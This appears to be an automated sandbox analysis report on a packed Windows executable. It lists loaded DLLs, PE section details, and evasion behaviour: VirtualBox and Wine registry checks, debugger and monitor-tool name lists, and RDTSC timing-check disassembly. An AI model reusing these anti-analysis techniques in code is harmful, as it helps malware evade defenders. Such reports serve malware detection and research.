Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00D929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00D929FF
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 5KwhHEdmM4.exeReversingLabs: Detection: 47%
Source: 5KwhHEdmM4.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: 5KwhHEdmM4.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSection loaded: kernel.appcore.dllJump to behavior
Source: 5KwhHEdmM4.exeStatic file information: File size 4488704 > 1048576
Source: 5KwhHEdmM4.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: 5KwhHEdmM4.exeStatic PE information: Raw size of dmqztadf is bigger than: 0x100000 < 0x1bb800

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeUnpacked PE file: 0.2.5KwhHEdmM4.exe.d90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmqztadf:EW;eghuolxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmqztadf:EW;eghuolxt:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: 5KwhHEdmM4.exeStatic PE information: real checksum: 0x4533e4 should be: 0x4546e1
Source: 5KwhHEdmM4.exeStatic PE information: section name:
Source: 5KwhHEdmM4.exeStatic PE information: section name: .idata
Source: 5KwhHEdmM4.exeStatic PE information: section name:
Source: 5KwhHEdmM4.exeStatic PE information: section name: dmqztadf
Source: 5KwhHEdmM4.exeStatic PE information: section name: eghuolxt
Source: 5KwhHEdmM4.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_3_01C64AD8 push eax; ret 0_3_01C64AD9
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_3_01C5E44B pushad ; ret 0_3_01C5E45D
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_3_01C64AD8 push eax; ret 0_3_01C64AD9
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_3_01C5E44B pushad ; ret 0_3_01C5E45D
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_3_01C64AD8 push eax; ret 0_3_01C64AD9
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_3_01C5E44B pushad ; ret 0_3_01C5E45D
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_011141D0 push eax; mov dword ptr [esp], edx0_2_011141D5
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E12340 push eax; mov dword ptr [esp], 00000000h0_2_00E12343
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E4C7F0 push eax; mov dword ptr [esp], 00000000h0_2_00E4C743
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DD0AC0 push eax; mov dword ptr [esp], 00000000h0_2_00DD0AC4
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DF1430 push eax; mov dword ptr [esp], 00000000h0_2_00DF1433
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E139A0 push eax; mov dword ptr [esp], 00000000h0_2_00E139A3
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DEDAD0 push eax; mov dword ptr [esp], edx0_2_00DEDAD1
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_01119F40 push dword ptr [eax+04h]; ret 0_2_01119F6F
Source: 5KwhHEdmM4.exeStatic PE information: section name: dmqztadf entropy: 7.955259097933418

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 14718E1 second address: 14718E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 14718E5 second address: 14718E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EF32A second address: 15EF32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EF32E second address: 15EF349 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F10C481811Ah 0x0000000e jg 00007F10C4818118h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15D7765 second address: 15D779B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F10C4816E0Ch 0x0000000b jns 00007F10C4816E02h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE413 second address: 15EE431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ch 0x00000007 jno 00007F10C4818116h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F10C4818116h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE431 second address: 15EE435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE435 second address: 15EE43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE709 second address: 15EE70D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE70D second address: 15EE72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F10C4818118h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F10C481811Ah 0x00000015 jnc 00007F10C4818116h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE72F second address: 15EE744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F10C4816DFEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE744 second address: 15EE753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jns 00007F10C4818116h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE753 second address: 15EE75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE9BF second address: 15EE9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE9C5 second address: 15EE9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F10C4816DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EE9CF second address: 15EEA15 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F10C4818129h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F10C4818128h 0x00000015 jmp 00007F10C481811Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EEA15 second address: 15EEA1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EEA1B second address: 15EEA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EEBA2 second address: 15EEBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816DFCh 0x00000009 popad 0x0000000a jmp 00007F10C4816E00h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15EEBC3 second address: 15EEBC8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15F155E second address: 15F1564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15F1564 second address: 15F1599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818126h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jbe 00007F10C481811Eh 0x00000015 jl 00007F10C4818118h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15F1599 second address: 15F15A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15F15A0 second address: 15F15D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818120h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F10C4818126h 0x00000015 jmp 00007F10C4818120h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15F15D0 second address: 15F15F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F10C4816DF6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+122D380Dh] 0x00000013 mov dl, 87h 0x00000015 lea ebx, dword ptr [ebp+124533DDh] 0x0000001b sub dx, 3211h 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15F15F6 second address: 15F160B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F10C4818118h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15F160B second address: 15F160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15F1686 second address: 15F168C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15F186D second address: 15F1881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4816E00h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15F1881 second address: 15F1885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16046EF second address: 16046F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E69F1 second address: 15E69FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F10C4818116h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16110A3 second address: 16110AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16113E2 second address: 16113F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C481811Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161155A second address: 1611573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16116EC second address: 16116FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16116FD second address: 1611703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1611C6B second address: 1611C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007F10C481812Fh 0x0000000b jmp 00007F10C4818129h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1611F31 second address: 1611F46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F10C4816E00h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1611F46 second address: 1611F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1611F51 second address: 1611F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1612078 second address: 1612083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F10C4818116h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1612083 second address: 1612089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1612089 second address: 16120D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F10C4818120h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F10C4818128h 0x00000018 ja 00007F10C4818126h 0x0000001e jmp 00007F10C4818120h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16120D5 second address: 16120DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16120DA second address: 16120E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E8403 second address: 15E840F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F10C4816DF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E840F second address: 15E8415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E8415 second address: 15E8419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E8419 second address: 15E8430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818123h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161221A second address: 1612229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816DFAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1612229 second address: 1612233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F10C4818116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1612966 second address: 16129BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E06h 0x00000007 jp 00007F10C4816DF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F10C4816E09h 0x00000014 jnl 00007F10C4816E0Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16129BF second address: 16129F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F10C4818128h 0x0000000e jmp 00007F10C4818121h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16129F1 second address: 16129F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1612B6D second address: 1612B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1612D21 second address: 1612D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1612D27 second address: 1612D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F10C4818128h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161882D second address: 1618832 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1617090 second address: 1617094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1617094 second address: 161709A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161709A second address: 161709F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
